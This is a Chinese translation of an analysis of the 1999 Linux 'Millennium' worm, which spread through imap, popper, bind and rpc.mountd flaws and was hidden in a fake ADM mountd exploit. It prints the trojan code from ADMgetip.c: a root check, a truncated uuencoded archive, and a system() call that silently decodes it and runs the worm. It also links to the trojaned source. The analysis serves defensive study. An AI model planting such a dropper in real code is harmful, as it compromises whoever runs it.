分析一个linux下的蠕虫

分析一个linux下的蠕虫

出自：Max Vision
分析一个linux下的蠕虫
Max Vision 译：quack 摘安全焦点

一、简介

千年蠕虫(The Millennium Internet Worm)——后面简称worm，是一段script及程序组成的，它执行的功能是利用linux系统的某些远程漏洞，获取该系统的进入权限，并且将自身复制到其上并继续繁殖。现在发现的worm是针对x86的linux中imap4v10.X,Qualcomm popper, bind , rpc.mountd 这些存在明显漏洞的服务进攻的。但它也做了一件好事——修补了安全漏洞……

二、技术分析

我们最早发现的蠕虫据称是在ADMmountd2的远程漏洞利用程序中的(这个程序是对linux的rpc.mountd服务进行攻击并可获取最高权限——这里不详述)，但ADM组织否认曾经发布过带有该特洛伊程序的代码，并将其归类于假冒ADM作品，可以参见ftp://adm.freelsd.net/ADM/FAKES/ maintained by ndubee@df.ru].

这个木马是放在ADMmountd的所谓更新版本中，并在措词中表明这一版本的利用程序更为实用，但其实隐蔽的代码就躲在ADMgetip.c中，ADM在其站点限制了对这一工具的下载，所以这里我把它提供给大家，仅仅是用于教育目的——这一木马于1999-8-15被发现。

你可以在http://focus.silversand.net/newsite/tool/adm_fake.c下载ADMgetip-TROJAN-VERSION.c。

1、原型

该代码段中有一段mworm.tgz的uuencode代码，当运行该程序时，它会被展开于目录/var/tmp/tmp，并且执行一个名为wormup的程序，代码段如下：

//Trojan Code from ADMgetip.c

FILE *fp=fopen("/var/tmp/tmp","w"); //打开文件
if(getuid()!=0) { fprintf(stderr,"operation not permitted/n"); exit(0); }
//检查uid是否为root
fprintf(fp,"begin-base64 644 mworm.tgz
H4sIANpU/TYAA+xaD3CUx3XfOx1wHALEHxts4/hDRrYE0vHdSQJkgQsIYWhk
UCSQHSM4n+6+4ztxujvfHypiuwEr1DqEYsWeTp1MUhOctEnr6biMnSbFY8vA
YNyBlGB3ShonZVy3ORmSIZgabMtcf293v7vvOwk7k4k7k5l8o3f7vd23b9++
... [ large uuencoded mworm.tgz here ]
emgL0uE1iuMHR6u1MaA8jUhjOHm2+OzzGLqoNLv0SRpBuNS6XmDYdwe6Z55f
bYCEt3q80+XpdMU1NM8J2FDCra2crXTRduAMD0Johcwe8ODFVzDnnwNKJcF8
ivJ+7s3IgAEDBgwYMGDAgAEDBgwYMGDAgAEDPxS+AlHjZQIA+AIA
====/n"); //这是一段很长的uuecoded过的代码
system("( cd /var/tmp;uudecode < tmp ; sleep 1; tar xzvf mworm.tgz;/
./wormup ) >/dev/null 2>/dev/null &"); //解码并执行wormup程序

注意如果权限并非root的话，是无法继续的，该mworm.tgz展开后有如下文件：

Directory of /var/tmp

-rw-r--r-- 1 root root 51564 Aug 17 22:21 mworm.tgz
-rwxr-xr-x 1 root root 8647 Dec 31 1999 Hnamed*
-rwxr-xr-x 1 root root 5173 Dec 31 1999 Hnamed.c*
-rwxr-xr-x 1 root root 477 Dec 31 1999 IP*
-rwxr-xr-x 1 root root 1728 Dec 31 1999 README-ADMINS*
-rwxr-xr-x 1 root root 5749 Dec 31 1999 bd*
-rwxr-xr-x 1 root root 1340 Dec 31 19